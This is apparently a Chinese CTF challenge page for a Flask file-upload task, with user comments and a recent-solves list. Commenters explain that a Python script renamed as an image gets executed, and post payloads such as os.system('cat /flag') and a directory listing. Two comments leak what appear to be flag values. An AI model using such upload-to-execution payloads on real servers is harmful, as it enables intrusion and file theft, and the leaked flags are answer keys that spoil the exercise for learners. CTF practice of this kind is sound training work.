Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12573
提  示:
描  述:
Flask_FileUpload
评论
1019697179 3年前

import os os.system('cat /flag')//导入OS才能使用system,cat是查询命令

回复 1

15091760453 3年前

flag{1c6b553c3a91791993b859e1625275ac}

回复 0

Cat00011cat 3年前

import os os.system('ls / -l') os.system('cat /flag')

回复 2

nf1y 3年前

为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de

回复 0
不知名学渣 3年前

@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?

回复 0

aWxvdmVjdGY 3年前

1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行

回复 0

白猫a 3年前

这个作者可以哇,题目解的真精彩!!!

回复 1

gfpeak 3年前

<!-- flag{9e5c134c066dc490c9644ecd9655a482} -->

回复 0
aWxvdmVjdGY 3年前

不同的场景答案是不一样的

回复 0

2224525664 3年前

我只想说牛逼!!!!来自小白的感叹

回复 1

18196731832 3年前

注意换行

回复 2
aWxvdmVjdGY 3年前

用python开发工具写就好了

回复 0

甜甜 3年前

恍然大悟呀

回复 0

丶我亚索贼六 3年前

import os os.system('cat /flag')

回复 1

玲珑湾 3年前

话说传个马上去会怎样

回复 2
admin999 3年前

传了php上去提示ValueError: too many values to unpack (expected 2) // Werkzeug Debugger

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

一只小白鲸 攻破了该题 1天前
Wu. 攻破了该题 1天前
qq1002517 攻破了该题 4天前
hdcc1 攻破了该题 7天前
藏在云层里的羊 攻破了该题 13天前
,, 攻破了该题 13天前
flag大王 攻破了该题 13天前
乱来小木 攻破了该题 13天前
xyqsin 攻破了该题 14天前
无情的白给机器人 攻破了该题 16天前
等往事风中吹‘ 攻破了该题 16天前
scv 攻破了该题 17天前
Digbick916 攻破了该题 17天前
Fengyu3321 攻破了该题 17天前
Xl2219 攻破了该题 18天前
chenzhong 攻破了该题 19天前
0xchang 攻破了该题 19天前
15144954824 攻破了该题 20天前
kiritoldws 攻破了该题 20天前
muerjing 攻破了该题 22天前
问题反馈